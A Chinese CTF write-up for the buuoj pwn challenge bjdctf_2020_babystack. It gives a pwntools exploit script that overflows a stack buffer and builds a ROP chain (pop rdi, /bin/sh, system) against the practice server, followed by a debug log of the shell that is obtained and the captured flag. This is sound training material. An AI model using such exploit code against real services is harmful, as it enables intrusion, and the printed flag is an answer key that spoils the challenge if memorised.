CTF buuoj pwn-----第10题: bjdctf_2020_babystack

---

1 思路

• 本题有后门函数, 最简单的是直接调用, 又快又好.
• 这里想用一下system函数,一开始忘了本题是64位的,调用约定不同, 写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功
• 后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag

2 编写exp

from pwn import *  

context.log_level='debug'

sh = remote('node4.buuoj.cn', 26883)
elf = ELF('./bjdctf_2020_babystack')  


pop_rdi_addr = 0x400833
system_addr = elf.sym['system']
binsh_addr = 0x400858
main_addr = elf.sym['main']


sh.recvuntil(b'name:\n')
payload_0= b'100'
sh.sendline(payload_0)

sh.recvuntil(b'name?\n')
payload_1 = b'a'*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr)
sh.sendline(payload_1)

sh.interactive()

3 运行exp ,获取flag

bing@bing-virtual-machine:~/pwn$ python3 ./bjdctf_2020_babystack.py 
[+] Opening connection to node4.buuoj.cn on port 26883: Done
[DEBUG] Received 0xe8 bytes:
    b'**********************************\n'
    b'*     Welcome to the BJDCTF!     *\n'
    b'* And Welcome to the bin world!  *\n'
    b"*  Let's try to pwn the world!   *\n"
    b'* Please told me u answer loudly!*\n'
    b'[+]Are u ready?\n'
    b'[+]Please input the length of your name:\n'
[DEBUG] Sent 0x4 bytes:
    b'100\n'
[DEBUG] Received 0x12 bytes:
    b"[+]What's u name?\n"
[DEBUG] Sent 0x31 bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    00000010  61 61 61 61  61 61 61 61  33 08 40 00  00 00 00 00  │aaaa│aaaa│3·@·│····│
    00000020  58 08 40 00  00 00 00 00  90 05 40 00  00 00 00 00  │X·@·│····│··@·│····│
    00000030  0a                                                  │·│
    00000031
[*] Switching to interactive mode
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x2b bytes:
    b'flag{25c317f8-0bac-4f52-84ca-0429c55a5e63}\n'
flag{25c317f8-0bac-4f52-84ca-0429c55a5e63}